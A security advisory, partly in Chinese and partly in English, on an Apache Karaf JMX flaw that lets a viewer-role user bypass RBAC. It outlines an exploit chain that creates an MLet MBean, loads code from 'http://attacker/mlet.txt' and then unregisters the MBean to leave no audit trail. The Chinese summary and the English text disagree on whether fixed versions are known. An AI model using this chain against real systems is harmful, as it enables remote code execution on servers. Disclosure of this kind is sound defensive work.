CVE-2026-92142 Apache Karaf 权限绕过漏洞
影响低权限用户可绕过RBAC执行未授权MBean操作
Apache Karaf 的远程 JMX 连接器默认启用,其 KarafMBeanServerGuard 通过动态代理对 MBean 操作实施基于角色的访问控制。但该守卫仅对 invoke、getAttribute、setAttribute 等固定方法名做 RBAC 检查,遗漏了 createMBean、registerMBean、unregisterMBean 等生命周期操作。
影响范围
Apache Karaf 中启用远程 JMX 连接器(默认端口 1099、44444)并使用 KarafMBeanServerGuard 的版本;具体受影响版本范围暂无公开信息。
漏洞详情
漏洞属于授权绕过(访问控制缺失)。KarafMBeanServerGuard 以 java.lang.reflect.Proxy 包装 MBeanServer,仅在 MBeanInvocationHandler#guarded 列表中列出的方法才转发给 RBAC 校验,而 createMBean/registerMBean/unregisterMBean 不在列表内,因此被直接放行。任何能通过 JMX 认证的用户(包括仅有 viewer 角色的最低权限用户)都可调用 createMBean() 实例化任意类为 MBean,并用 unregisterMBean() 移除,且无授权检查与审计日志。
利用条件与风险
利用前提是攻击者能访问并认证到远程 JMX 端点,且该端点默认开启。实战中低权限账户即可绕过 RBAC 执行未授权操作,可能被用于加载恶意 MBean 进而扩大影响,风险较高。
修复建议
官方修复方案暂无公开信息,建议关注 Apache Karaf 官方安全公告并升级至修复版本。临时缓解措施:关闭或限制远程 JMX 连接器(端口 1099、44444)的访问,仅允许可信网络与账户连接,并遵循最小权限原则配置 JMX 角色。
Apache Karaf exposes a JMX MBeanServer guarded by KarafMBeanServerGuard, which enforces role-based access control (RBAC) on MBean operations invoked over the remote JMX connector (RMI registry/server, enabled by default on ports 1099 and 44444). The guard is implemented as a java.lang.reflect.Proxy around the MBeanServer, and only forwards a fixed list of operation names to the RBAC check, defined in MBeanInvocationHandler#guarded:
private final List guarded = Collections.unmodifiableList( Arrays.asList(“invoke”, “getAttribute”, “getAttributes”, “setAttribute”, “setAttributes”));
The MBean lifecycle operations MBeanServer#createMBean, #registerMBean and #unregisterMBean are not in this list. Calls to these methods are forwarded directly to the underlying MBeanServer with no role check at all, regardless of the roles configured in etc/jmx.acl.*.cfg.
As a result, any user who can authenticate to the JMX endpoint, including a user holding only the least-privileged “viewer” role, can call createMBean() to instantiate an arbitrary class as a MBean, and unregisterMBean() to remove it again afterwards, with no authorization check and no audit log entry (logging in KarafMBeanServerGuard only occurs on the RBAC-denial path, which this bypass never reaches).
This is significant because javax.management.loading.MLet, a standard JDK MBean, can be instantiated this way. MLet acts as a remote classloader: its getMBeansFromURL(URL) operation fetches an MLet text file from an attacker-controlled URL and instantiates and registers the classes it lists as new MBeans in the target JVM. Reaching this operation still goes through KarafMBeanServerGuard’s existing “invoke” check, but the default etc/jmx.acl.cfg grants the “viewer” role to any method name matching the wildcard rule “get* = viewer”, a heuristic intended for read-only getters. Because “getMBeansFromURL” happens to start with “get”, it also matches that rule, so a default installation grants “viewer” callers permission to invoke it without any Karaf-specific ACL naming MLet at all. Combined with the createMBean gap, this gives a “viewer”-role JMX client a path to remote code execution to the Karaf JVM:
* Authenticate to JMX as any user with any role (e.g. “viewer”).
* mbs.createMBean(“javax.management.loading.MLet”, objectName) is not in GUARDED_OPERATIONS, no RBAC check, MLet is instantiated and registered.
* mbs.invoke(objectName, “getMBeansFromURL”, new Object[]{“http://attacker/mlet.txt”}, …) is guarded, but the method name matches the default “get* = viewer” ACL rule, so permitted.
* The remote .mlet file is fetched and its listed classes are loaded and registered as new MBeans, running attacker-supplied code in the Karaf JVM.
* mbs.unregisterMBean(objectName) can be used to remove the MLet afterwards, also not in GUARDED_OPERATIONS, no RBAC check, no audit trail.
The fix adds createMBean, registerMBean and unregisterMBean to the guarded operation list, resolves required roles for them from the jmx.acl* configuration by ObjectName and (for createMBean/registerMBean) MBean class name, and ships default etc/jmx.acl.cfg entries restricting all three operations to the “admin” role. This allows deployments to also write class-name-specific rule, e.g.:
createMBean(java.lang.String)[/javax.management.loading..*/] = admin
Apache Karaf users should upgrade to 4.4.12 or 4.5.0 or later, once released, as soon as possible. Until an upgrade is available, restrict network access to the JMX RMI registry/server ports (1099/44444) to trusted hosts, or avoid issuing any non-“admin” JMX credentiels.